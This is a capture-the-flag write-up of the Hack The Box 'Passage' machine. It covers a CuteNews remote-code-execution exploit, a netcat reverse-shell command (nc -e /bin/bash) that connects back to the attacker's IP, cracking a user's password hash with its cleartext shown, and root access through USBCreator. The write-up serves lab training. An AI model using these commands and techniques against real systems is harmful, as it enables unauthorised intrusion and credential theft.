Passage ~ Hack The Box

Passage ~ Hack The Box

·

4 min read


Prerequisite

Passage ~ Hack The Box

Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.

echo "10.10.10.215 academy.htb" >> /etc/hosts

hosts file entry

Passage ~ Hack The Box

Okay now onto the hacking!


Reconnaissance

As always, I started off with an NMAP scan against the machine.

┌──(root💀kali)-[/home/…/boxes/htb/machines/passage] └─# nmap -Pn -sC -sV -oN initial passage.htb

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( nmap.org ) at 2021-02-11 18:36 EST Nmap scan report for passage.htb (10.10.10.206) Host is up (0.0056s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA) | 256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA) |_ 256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Passage News Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scanning & Enumeration

Based on the scan that was run, I realized that port 80 was running a web server. This was the web app that was being served!

Passage ~ Hack The Box

Passage ~ Hack The Box

There wasn't much on the page itself except that it was run by CuteNews. Thus, I decided to take a look at the source code.

Passage ~ Hack The Box

The source revealed a directory named CuteNews. Accessing that brought me to a login page.

Passage ~ Hack The Box

On top of the login page, I was also able to identify the version that the webapp was running.

A quick google search revealed that there was an RCE exploit available for this version of CuteNews. There was also a POC on github by CRFSlick.

Exploitation

This exploit made use of a profile picture upload vulnerability which allowed users to run arbitrary code on the remote machine. The python script I used automated all these actions and gave a live remote shell.

Passage ~ Hack The Box

Before running the exploit, I had to create an account on the website.

Passage ~ Hack The Box

Followed by that, I ran the exploit which gave me a reverse shell onto the box.

Passage ~ Hack The Box

Now, all that was left to do was to get a proper reverse shell onto my machine using bash / nc.

Passage ~ Hack The Box

Remote Machine: $> nc -e /bin/bash 10.10.14.47 666

Local Machine: ┌──(root💀kali)-[/home/…/boxes/htb/machines/passage] └─# nc -lvp 666

Lateral Movement [Level 1]

After poking around for awhile, I noticed that CuteNews had hashes of user passwords stored in the cdata/users directory. I decided to explore this. I was also aware that there was a user named paul from the home directories.

Passage ~ Hack The Box

Passage ~ Hack The Box

There was too many for me to go through. Thus, I concatenated all files together and removed everything that was not a hash.

Passage ~ Hack The Box

This made it easier for me to decode the base64 values. I made use of cyberchef to decode the values.

Passage ~ Hack The Box

CyberChef

Next, I grepped the file for the word paul to get his credential hash.

Passage ~ Hack The Box

After I got the hash, I turned to CrackStation to quickly get it cracked.

e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd

Passage ~ Hack The Box

After getting the password atlanta1, I was able to retrieve the user flag from paul's account~!

Passage ~ Hack The Box

Lateral Movement [Level 2]

Looking at the .ssh directory explains that nadav@passage had access to Paul's account.

Passage ~ Hack The Box

Thus, I assumed that Paul would have the same access to the nadav's account and tried to ssh.

Passage ~ Hack The Box

And....I was in nadav's account!

Privilege Escalation

As always, I busted out Linpeas which told me that the USBCreator on the machine was vulnerable and could be exploited!

Passage ~ Hack The Box

Couple google searches later, I found a POC with explanation by PaloAlto Networks which I used to exploit this vulnerability!

Passage ~ Hack The Box

ROOTY!